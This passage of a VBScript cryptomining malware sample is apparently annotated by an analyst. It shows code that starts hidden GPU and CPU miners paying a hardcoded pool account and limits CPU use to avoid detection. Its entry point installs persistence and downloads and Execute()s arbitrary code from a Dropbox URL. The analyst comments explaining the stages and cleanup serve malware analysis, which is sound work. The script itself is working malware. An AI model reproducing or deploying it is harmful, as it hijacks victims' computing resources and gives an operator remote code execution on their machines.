call ex("cmd.exe /c " & cgm & " -o api.bitcoin.cz:8332 -O hallmining.worker1:7d9LwsMG --no-pool-disable -I -2")
end sub
' startCPUMining: launches the CPU miner (hidden, via cmd.exe /c) against the same
' pool and worker account as the GPU miner. Thread count is half of
' %NUMBER_OF_PROCESSORS% (integer division), at least 1 — presumably to keep CPU
' usage below what a user would notice (inference).
sub startCPUMining()
threads = getEnv("NUMBER_OF_PROCESSORS")
if threads = false then
threads = 1
else
if (threads > 1) then
threads = int(threads/2)
end if
end if
rpcm = getMinerPath("cpu")
'FIXME: Change minnig account!!!!!
call ex("cmd.exe /c " & rpcm & " -url=http://api.bitcoin.cz:8332 -threads=" & threads & " -user=hallmining.worker1 -password=7d9LwsMG")
end sub
' payload: if no miner is already running, make sure the binaries are present, then
' prefer GPU mining when openCL.dll is found on PATH; wait 10 s and fall back to
' CPU mining if no miner process appeared. Without OpenCL, go straight to CPU mining.
' Called on every start (i.e. every minute via the task), so killing the miner
' process alone only buys a minute.
sub payload()
running = verifyPayloadRunning()
if (running = false) then
call getRequiredPackages()
tmp = findTmpDir()
if (tmp <> false) then
if (fileExists("openCL.dll") = true) then
call startGPUMining()
wscript.sleep(10000)
if (verifyPayloadRunning() = false) then
call startCPUMining()
end if
else
call startCPUMining()
end if
end if
end if
end sub
' ---- Entry point / analyst summary --------------------------------------------
' What this script does, in order:
'   1. infect()        copies itself to %TEMP%\winlogin.vbs and %USERPROFILE%\winlogin.vbs
'                      and installs Run value(s) "Microsoft Login Script", the Startup
'                      shortcut "Windows Login Script.lnk" and a scheduled task
'                      "Windows Login Script" that re-runs it every minute (hourly AT
'                      jobs on XP).
'   2. checkIfRunning  exits if another wscript.exe is already running.
'   3. dlEval(...)     downloads and Execute()s whatever text the Dropbox URL returns
'                      ("?" & Timer is only a cache-buster). This is remote code
'                      execution: the operator could have run anything, so removing
'                      the miner alone is not proof the host is clean.
'   4. payload()       fetches/unpacks the miner package if needed and starts GPU
'                      mining (openCL.dll on PATH) or CPU mining on half the cores,
'                      paying out to pool api.bitcoin.cz, worker hallmining.worker1.
' A script with a per-minute task and autorun entries is not "inactive" while it
' stays on disk. Cleanup implied by the code: the task / AT jobs, the HKCU and HKLM
' Run values, the .lnk, both winlogin.vbs copies, %TEMP%\arc.exe, %TEMP%\cgm,
' %TEMP%\rpcm, and the msdc.exe / svehost.exe (and wmisrv.exe) processes.
' On Error Resume Next hides every failure, so partial installs are likely.
'TODO: scramble code
On Error Resume Next
call infect()
call checkIfRunning(true)
'FIXME: CHANGE ADDRESS!
call dlEval("https://dl.dropbox.com/s/ybpzekpv8vmhka6/test.txt?" & Timer)
call payload()